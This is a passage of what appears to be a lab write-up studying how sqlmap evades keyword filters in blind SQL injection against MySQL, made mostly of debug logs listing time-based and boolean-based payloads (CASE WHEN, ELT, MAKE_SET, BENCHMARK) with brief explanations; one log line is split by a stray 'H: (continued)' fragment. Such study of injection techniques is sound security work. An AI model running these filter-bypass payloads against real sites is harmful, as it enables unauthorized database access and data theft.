[23:03:58] [PAYLOAD] (CASE WHEN (61=63) THEN SLEEP(5) ELSE 1146 END)
[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:58] [PAYLOAD] (CASE WHEN (61=90) THEN SLEEP(5) ELSE 8312 END)
[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:58] [PAYLOAD] (CASE WHEN (90=63) THEN SLEEP(5) ELSE 7015 END)
[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:58] [PAYLOAD] (CASE WHEN (63=63) THEN SLEEP(5) ELSE 5683 END)
[23:04:03] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:04:03] [PAYLOAD] (CASE WHEN (90 63) THEN SLEEP(5) ELSE 1858 END)
[23:04:03] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:04:03] [DEBUG] checking for parameter length constrainting mechanisms
[23:04:03] [PAYLOAD] (CASE WHEN (5036=[... long run of spaces trimmed ...]5036) THEN SLEEP(5) ELSE 3974 END)
[23:04:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:04:08] [DEBUG] checking for filtered characters
[23:04:08] [PAYLOAD] (CASE WHEN (6800>6799) THEN SLEEP(5) ELSE 4861 END)
[23:04:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[23:04:13] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 1052 HTTP(s) requests:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: id=(CASE WHEN (6409=6409) THEN SLEEP(5) ELSE 6409 END)
    Vector: (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)
---
[23:04:13] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

If AND, OR, RLIKE and CASE are blocked, sqlmap queries with SELECT directly, without using AND or OR (screenshot):

If AND, OR, RLIKE, CASE and SELECT are blocked:

ELT(N,str1,str2,str3,...) returns str1 if N = 1, str2 if N = 2, and so on. It returns NULL if N is less than 1 or greater than the number of arguments. ELT() is the complement of FIELD(). In the payload ELT(24=24,SLEEP(5)) the comparison evaluates to 1 when true, so ELT selects its first string argument and SLEEP(5) runs (the 5-second gap in the log below); when it evaluates to 0, ELT returns NULL and there is no delay.
[23:08:59] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[23:08:59] [PAYLOAD] ELT(24=24,SLEEP(5))
[23:09:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:04] [PAYLOAD] ELT(24=44,SLEEP(5))
[23:09:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:04] [PAYLOAD] ELT(24=65,SLEEP(5))
[23:09:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:05] [PAYLOAD] ELT(65=44,SLEEP(5))
[23:09:05] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:05] [PAYLOAD] ELT(44=44,SLEEP(5))
[23:09:10] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:10] [PAYLOAD] ELT(65 44,SLEEP(5))
[23:09:10] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:10] [PAYLOAD] ELT(33=33,SLEEP(5))
[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:15] [PAYLOAD] ELT(33=59,SLEEP(5))
[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:15] [PAYLOAD] ELT(33=77,SLEEP(5))
[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:15] [PAYLOAD] ELT(77=59,SLEEP(5))
[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:15] [PAYLOAD] ELT(59=59,SLEEP(5))
[23:09:20] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:20] [PAYLOAD] ELT(77 59,SLEEP(5))
[23:09:20] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:20] [PAYLOAD] ELT(18=18,SLEEP(5))
[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:25] [PAYLOAD] ELT(18=49,SLEEP(5))
[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:25] [PAYLOAD] ELT(18=57,SLEEP(5))
[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:25] [PAYLOAD] ELT(57=49,SLEEP(5))
[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:25] [PAYLOAD] ELT(49=49,SLEEP(5))
[23:09:30] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:30] [PAYLOAD] ELT(57 49,SLEEP(5))
[23:09:31] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:31] [PAYLOAD] ELT(30=30,SLEEP(5))
[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:36] [PAYLOAD] ELT(30=34,SLEEP(5))
[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:36] [PAYLOAD] ELT(30=71,SLEEP(5))
[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:36] [PAYLOAD] ELT(71=34,SLEEP(5))
[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:36] [PAYLOAD] ELT(34=34,SLEEP(5))
[23:09:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:41] [PAYLOAD] ELT(71 34,SLEEP(5))
[23:09:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:41] [PAYLOAD] ELT(19=19,SLEEP(5))
[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:46] [PAYLOAD] ELT(19=30,SLEEP(5))
[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:46] [PAYLOAD] ELT(19=55,SLEEP(5))
[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:46] [PAYLOAD] ELT(55=30,SLEEP(5))
[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:46] [PAYLOAD] ELT(30=30,SLEEP(5))
[23:09:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:51] [PAYLOAD] ELT(55 30,SLEEP(5))
[23:09:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:51] [DEBUG] checking for parameter length constrainting mechanisms
[23:09:51] [PAYLOAD] ELT(9111=[... long run of spaces trimmed ...]9111,SLEEP(5))
[23:09:56] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:09:56] [DEBUG] checking for filtered characters
[23:09:56] [PAYLOAD] ELT(9294>9293,SLEEP(5))
[23:10:01] [DEBUG] got HTTP error code: 500 (Internal Server Error)
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[23:10:02] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 1056 HTTP(s) requests:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL time-based blind - Parameter replace (ELT)
    Payload: id=ELT(1874=1874,SLEEP(5))
    Vector: ELT([INFERENCE],SLEEP([SLEEPTIME]))
---

If AND, OR, RLIKE, CASE, SELECT and ELT are blocked:

MAKE_SET(bits,str1,str2,...) returns a set value (a string whose substrings are separated by ',' characters) made up of the strings whose corresponding bit in bits is set. str1 corresponds to bit 0, str2 to bit 1, and so on. NULL values among str1, str2, ... are not appended to the result. In the payload MAKE_SET(54=54,SLEEP(5)) a true comparison gives bits = 1, so bit 0 is set and SLEEP(5) is evaluated; a false comparison gives bits = 0 and nothing is evaluated, so there is no delay.
[23:13:17] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[23:13:17] [PAYLOAD] MAKE_SET(54=54,SLEEP(5))
[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:22] [PAYLOAD] MAKE_SET(54=83,SLEEP(5))
[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:22] [PAYLOAD] MAKE_SET(54=97,SLEEP(5))
[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:22] [PAYLOAD] MAKE_SET(97=83,SLEEP(5))
[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:22] [PAYLOAD] MAKE_SET(83=83,SLEEP(5))
[23:13:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:27] [PAYLOAD] MAKE_SET(97 83,SLEEP(5))
[23:13:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:28] [PAYLOAD] MAKE_SET(23=23,SLEEP(5))
[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:33] [PAYLOAD] MAKE_SET(23=39,SLEEP(5))
[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:33] [PAYLOAD] MAKE_SET(23=50,SLEEP(5))
[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:33] [PAYLOAD] MAKE_SET(50=39,SLEEP(5))
[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:33] [PAYLOAD] MAKE_SET(39=39,SLEEP(5))
[23:13:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:38] [PAYLOAD] MAKE_SET(50 39,SLEEP(5))
[23:13:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:38] [PAYLOAD] MAKE_SET(24=24,SLEEP(5))
[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:43] [PAYLOAD] MAKE_SET(24=69,SLEEP(5))
[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:43] [PAYLOAD] MAKE_SET(24=95,SLEEP(5))
[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:43] [PAYLOAD] MAKE_SET(95=69,SLEEP(5))
[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:43] [PAYLOAD] MAKE_SET(69=69,SLEEP(5))
[23:13:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:48] [PAYLOAD] MAKE_SET(95 69,SLEEP(5))
[23:13:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:48] [PAYLOAD] MAKE_SET(38=38,SLEEP(5))
[23:13:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:53] [PAYLOAD] MAKE_SET(38=64,SLEEP(5))
[23:13:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:53] [PAYLOAD] MAKE_SET(38=88,SLEEP(5))
[23:13:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:54] [PAYLOAD] MAKE_SET(88=64,SLEEP(5))
[23:13:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:54] [PAYLOAD] MAKE_SET(64=64,SLEEP(5))
[23:13:59] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:59] [PAYLOAD] MAKE_SET(88 64,SLEEP(5))
[23:13:59] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:13:59] [PA

H: (continued) YLOAD] MAKE_SET(90=90,SLEEP(5))
[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:14:04] [PAYLOAD] MAKE_SET(90=92,SLEEP(5))
[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:14:04] [PAYLOAD] MAKE_SET(90=96,SLEEP(5))
[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:14:04] [PAYLOAD] MAKE_SET(96=92,SLEEP(5))
[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:14:04] [PAYLOAD] MAKE_SET(92=92,SLEEP(5))
[23:14:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:14:09] [PAYLOAD] MAKE_SET(96 92,SLEEP(5))
[23:14:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:14:09] [DEBUG] checking for parameter length constrainting mechanisms
[23:14:09] [PAYLOAD] MAKE_SET(4328=[... long run of spaces trimmed ...]4328,SLEEP(5))
[23:14:14] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:14:14] [DEBUG] checking for filtered characters
[23:14:14] [PAYLOAD] MAKE_SET(2779>2778,SLEEP(5))
[23:14:19] [DEBUG] got HTTP error code: 500 (Internal Server Error)
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[23:14:19] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 1057 HTTP(s) requests:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL time-based blind - Parameter replace (MAKE_SET)
    Payload: id=MAKE_SET(3840=3840,SLEEP(5))
    Vector: MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))
---

Once AND, OR, RLIKE, CASE, SELECT, ELT and MAKE_SET are all banned at the same time, the time-based run fails: every vector tried so far needed one of them.

Back to the starting point: this time ban only the string SLEEP.

BENCHMARK(count, expr) evaluates the expression expr count times. It exists to time how fast MySQL evaluates an expression, and its return value is always 0. As a delay primitive it is what sqlmap labels a "heavy query": the wait comes from burning CPU rather than from a timer, so it is shorter and noisier than SLEEP(5) (in the log below a true condition costs roughly one second) and depends on how loaded the server is.
[23:31:34] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[23:31:34] [PAYLOAD] 1 AND 8586=IF((62=62),BENCHMARK(5000000,MD5(0x49787364)),8586)
[23:31:35] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:35] [PAYLOAD] 1 AND 3175=IF((62=86),BENCHMARK(5000000,MD5(0x616f6b74)),3175)
[23:31:35] [PAYLOAD] 1 AND 1368=IF((62=98),BENCHMARK(5000000,MD5(0x66457065)),1368)
[23:31:35] [PAYLOAD] 1 AND 2362=IF((98=86),BENCHMARK(5000000,MD5(0x4e6f5a6a)),2362)
[23:31:35] [PAYLOAD] 1 AND 5234=IF((86=86),BENCHMARK(5000000,MD5(0x6d4e6d49)),5234)
[23:31:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:36] [PAYLOAD] 1 AND 5792=IF((98 86),BENCHMARK(5000000,MD5(0x75735371)),5792)
[23:31:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:36] [PAYLOAD] 1 AND 7985=IF((14=14),BENCHMARK(5000000,MD5(0x78417065)),7985)
[23:31:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:37] [PAYLOAD] 1 AND 5476=IF((14=53),BENCHMARK(5000000,MD5(0x7267436f)),5476)
[23:31:37] [PAYLOAD] 1 AND 2433=IF((14=76),BENCHMARK(5000000,MD5(0x52756b6f)),2433)
[23:31:37] [PAYLOAD] 1 AND 2054=IF((76=53),BENCHMARK(5000000,MD5(0x6c4c6e66)),2054)
[23:31:37] [PAYLOAD] 1 AND 6832=IF((53=53),BENCHMARK(5000000,MD5(0x6e507a50)),6832)
[23:31:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:38] [PAYLOAD] 1 AND 4267=IF((76 53),BENCHMARK(5000000,MD5(0x6a766347)),4267)
[23:31:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:38] [PAYLOAD] 1 AND 6289=IF((22=22),BENCHMARK(5000000,MD5(0x5258624a)),6289)
[23:31:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:39] [PAYLOAD] 1 AND 7746=IF((22=62),BENCHMARK(5000000,MD5(0x4f597465)),7746)
[23:31:39] [PAYLOAD] 1 AND 1055=IF((22=64),BENCHMARK(5000000,MD5(0x4f485952)),1055)
[23:31:39] [PAYLOAD] 1 AND 7423=IF((64=62),BENCHMARK(5000000,MD5(0x6d64586e)),7423)
[23:31:39] [PAYLOAD] 1 AND 1586=IF((62=62),BENCHMARK(5000000,MD5(0x71696243)),1586)
[23:31:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:40] [PAYLOAD] 1 AND 9110=IF((64 62),BENCHMARK(5000000,MD5(0x4f7a5241)),9110)
[23:31:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:40] [PAYLOAD] 1 AND 4776=IF((12=12),BENCHMARK(5000000,MD5(0x596c7457)),4776)
[23:31:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:40] [PAYLOAD] 1 AND 8424=IF((12=22),BENCHMARK(5000000,MD5(0x457a486e)),8424)
[23:31:40] [PAYLOAD] 1 AND 2962=IF((12=32),BENCHMARK(5000000,MD5(0x6d567677)),2962)
[23:31:40] [PAYLOAD] 1 AND 7592=IF((32=22),BENCHMARK(5000000,MD5(0x6e4b6746)),7592)
[23:31:41] [PAYLOAD] 1 AND 2975=IF((22=22),BENCHMARK(5000000,MD5(0x416a6f6a)),2975)
[23:31:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:41] [PAYLOAD] 1 AND 2138=IF((32 22),BENCHMARK(5000000,MD5(0x7342766c)),2138)
[23:31:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:42] [PAYLOAD] 1 AND 9458=IF((47=47),BENCHMARK(5000000,MD5(0x4458447a)),9458)
[23:31:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:43] [PAYLOAD] 1 AND 8078=IF((47=48),BENCHMARK(5000000,MD5(0x4652454b)),8078)
[23:31:43] [PAYLOAD] 1 AND 5384=IF((47=76),BENCHMARK(5000000,MD5(0x4f6d706e)),5384)
[23:31:43] [PAYLOAD] 1 AND 9112=IF((76=48),BENCHMARK(5000000,MD5(0x764f626b)),9112)
[23:31:43] [PAYLOAD] 1 AND 9116=IF((48=48),BENCHMARK(5000000,MD5(0x6873764a)),9116)
[23:31:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:44] [PAYLOAD] 1 AND 2917=IF((76 48),BENCHMARK(5000000,MD5(0x557a6c62)),2917)
[23:31:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:44] [DEBUG] checking for parameter length constrainting mechanisms
[23:31:44] [PAYLOAD] 1 AND 2065=IF((9201=[...long run of spaces...]9201),BENCHMARK(5000000,MD5(0x57724358)),2065)
[23:31:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:31:45] [DEBUG] checking for filtered characters
[23:31:45] [PAYLOAD] 1 AND 1617=IF((3411>3410),BENCHMARK(5000000,MD5(0x56496575)),1617)
[23:31:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[23:31:45] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 437 HTTP(s) requests:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 4803=BENCHMARK(5000000,MD5(0x44487655))
    Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
---

When SLEEP and BENCHMARK are both banned the run fails, so every time-based vector is built on one of these two functions. One detail worth reading off the MAKE_SET timestamps above: a true condition costs the full five seconds while a false one returns almost at once, so MySQL only evaluates the SLEEP argument whose bit is set. That lazy argument evaluation is what lets MAKE_SET (and ELT) stand in for IF once IF-style keywords are filtered.


Boolean-based blind injection (B)

By default the condition is appended with AND, and sqlmap decides whether it held by checking whether the response is identical to the original page.

[23:38:26] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[23:38:26] [PAYLOAD] 1 AND 33=33
[23:38:26] [PAYLOAD] 1 AND 33=96
[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:26] [PAYLOAD] 1 AND 96=76
[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:26] [PAYLOAD] 1 AND 76=76
[23:38:26] [PAYLOAD] 1 AND 96 76
[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:26] [PAYLOAD] 1 AND 70=70
[23:38:26] [PAYLOAD] 1 AND 70=96
[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:26] [PAYLOAD] 1 AND 96=81
[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:26] [PAYLOAD] 1 AND 81=81
[23:38:26] [PAYLOAD] 1 AND 96 81
[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:26] [PAYLOAD] 1 AND 33=33
[23:38:26] [PAYLOAD] 1 AND 33=67
[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:27] [PAYLOAD] 1 AND 67=52
[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:27] [PAYLOAD] 1 AND 52=52
[23:38:27] [PAYLOAD] 1 AND 67 52
[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:27] [PAYLOAD] 1 AND 16=16
[23:38:27] [PAYLOAD] 1 AND 16=96
[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:27] [PAYLOAD] 1 AND 96=64
[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:27] [PAYLOAD] 1 AND 64=64
[23:38:27] [PAYLOAD] 1 AND 96 64
[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:27] [PAYLOAD] 1 AND 38=38
[23:38:27] [PAYLOAD] 1 AND 38=71
[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:27] [PAYLOAD] 1 AND 71=57
[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:27] [PAYLOAD] 1 AND 57=57
[23:38:27] [PAYLOAD] 1 AND 71 57
[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:38:27] [DEBUG] checking for parameter length constrainting mechanisms
[23:38:27] [PAYLOAD] 1 AND 9527=[...long run of spaces...]9527
[23:38:27] [DEBUG] checking for filtered characters
[23:38:27] [PAYLOAD] 1 AND (1709)=1709
[23:38:27] [PAYLOAD] 1 AND 1710>1709
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[23:38:27] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 39 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 4833=4833
    Vector: AND [INFERENCE]
---

Ban AND

sqlmap switches to a CASE WHEN ... THEN ... END expression that replaces the whole parameter.

[23:41:16] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[23:41:16] [PAYLOAD] (CASE WHEN (21=21) THEN 1 ELSE 5844*(SELECT 5844 FROM DUAL UNION SELECT 7325 FROM DUAL) END)
[23:41:16] [PAYLOAD] (CASE WHEN (21=64) THEN 1 ELSE 9219*(SELECT 9219 FROM DUAL UNION SELECT 1744 FROM DUAL) END)
[23:41:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:17] [PAYLOAD] (CASE WHEN (64=59) THEN 1 ELSE 8110*(SELECT 8110 FROM DUAL UNION SELECT 2379 FROM DUAL) END)
[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:17] [PAYLOAD] (CASE WHEN (59=59) THEN 1 ELSE 7130*(SELECT 7130 FROM DUAL UNION SELECT 4552 FROM DUAL) END)
[23:41:17] [PAYLOAD] (CASE WHEN (64 59) THEN 1 ELSE 3780*(SELECT 3780 FROM DUAL UNION SELECT 9899 FROM DUAL) END)
[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:17] [PAYLOAD] (CASE WHEN (60=60) THEN 1 ELSE 9062*(SELECT 9062 FROM DUAL UNION SELECT 4510 FROM DUAL) END)
[23:41:17] [PAYLOAD] (CASE WHEN (60=94) THEN 1 ELSE 5004*(SELECT 5004 FROM DUAL UNION SELECT 2949 FROM DUAL) END)
[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:17] [PAYLOAD] (CASE WHEN (94=82) THEN 1 ELSE 1182*(SELECT 1182 FROM DUAL UNION SELECT 7567 FROM DUAL) END)
[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:17] [PAYLOAD] (CASE WHEN (82=82) THEN 1 ELSE 8876*(SELECT 8876 FROM DUAL UNION SELECT 5433 FROM DUAL) END)
[23:41:17] [PAYLOAD] (CASE WHEN (94 82) THEN 1 ELSE 5776*(SELECT 5776 FROM DUAL UNION SELECT 9763 FROM DUAL) END)
[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:17] [PAYLOAD] (CASE WHEN (34=34) THEN 1 ELSE 4935*(SELECT 4935 FROM DUAL UNION SELECT 5480 FROM DUAL) END)
[23:41:17] [PAYLOAD] (CASE WHEN (34=82) THEN 1 ELSE 3865*(SELECT 3865 FROM DUAL UNION SELECT 1281 FROM DUAL) END)
[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:17] [PAYLOAD] (CASE WHEN (82=36) THEN 1 ELSE 8529*(SELECT 8529 FROM DUAL UNION SELECT 9064 FROM DUAL) END)
[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:17] [PAYLOAD] (CASE WHEN (36=36) THEN 1 ELSE 3222*(SELECT 3222 FROM DUAL UNION SELECT 9853 FROM DUAL) END)
[23:41:17] [PAYLOAD] (CASE WHEN (82 36) THEN 1 ELSE 5873*(SELECT 5873 FROM DUAL UNION SELECT 6193 FROM DUAL) END)
[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:18] [PAYLOAD] (CASE WHEN (14=14) THEN 1 ELSE 4089*(SELECT 4089 FROM DUAL UNION SELECT 2387 FROM DUAL) END)
[23:41:18] [PAYLOAD] (CASE WHEN (14=40) THEN 1 ELSE 8087*(SELECT 8087 FROM DUAL UNION SELECT 6170 FROM DUAL) END)
[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:18] [PAYLOAD] (CASE WHEN (40=37) THEN 1 ELSE 5070*(SELECT 5070 FROM DUAL UNION SELECT 7441 FROM DUAL) END)
[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:18] [PAYLOAD] (CASE WHEN (37=37) THEN 1 ELSE 2768*(SELECT 2768 FROM DUAL UNION SELECT 7753 FROM DUAL) END)
[23:41:18] [PAYLOAD] (CASE WHEN (40 37) THEN 1 ELSE 1946*(SELECT 1946 FROM DUAL UNION SELECT 9529 FROM DUAL) END)
[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:18] [PAYLOAD] (CASE WHEN (31=31) THEN 1 ELSE 5197*(SELECT 5197 FROM DUAL UNION SELECT 2014 FROM DUAL) END)
[23:41:18] [PAYLOAD] (CASE WHEN (31=75) THEN 1 ELSE 9154*(SELECT 9154 FROM DUAL UNION SELECT 4722 FROM DUAL) END)
[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:18] [PAYLOAD] (CASE WHEN (75=48) THEN 1 ELSE 9742*(SELECT 9742 FROM DUAL UNION SELECT 5455 FROM DUAL) END)
[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:18] [PAYLOAD] (CASE WHEN (48=48) THEN 1 ELSE 7816*(SELECT 7816 FROM DUAL UNION SELECT 2905 FROM DUAL) END)
[23:41:18] [PAYLOAD] (CASE WHEN (75 48) THEN 1 ELSE 1589*(SELECT 1589 FROM DUAL UNION SELECT 7267 FROM DUAL) END)
[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:41:18] [DEBUG] checking for parameter length constrainting mechanisms
[23:41:18] [PAYLOAD] (CASE WHEN (9454=[...long run of spaces...]9454) THEN 1 ELSE 6518*(SELECT 6518 FROM DUAL UNION SELECT 2474 FROM DUAL) END)
[23:41:18] [DEBUG] checking for filtered characters
[23:41:18] [PAYLOAD] (CASE WHEN ((1557)=1557) THEN 1 ELSE 9993*(SELECT 9993 FROM DUAL UNION SELECT 7747 FROM DUAL) END)
[23:41:18] [PAYLOAD] (CASE WHEN (1558>1557) THEN 1 ELSE 8687*(SELECT 8687 FROM DUAL UNION SELECT 8396 FROM DUAL) END)
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[23:41:18] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 655 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL) (original value)
    Payload: id=(CASE WHEN (4416=4416) THEN 1 ELSE 4416*(SELECT 4416 FROM DUAL UNION SELECT 9695 FROM DUAL) END)
    Vector: (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
---

Ban AND and CASE

sqlmap falls back to the MAKE_SET function.

[09:08:50] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[09:08:50] [PAYLOAD] MAKE_SET(36=36,1)
[09:08:50] [PAYLOAD] MAKE_SET(36=97,1)
[09:08:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:50] [PAYLOAD] MAKE_SET(97=52,1)
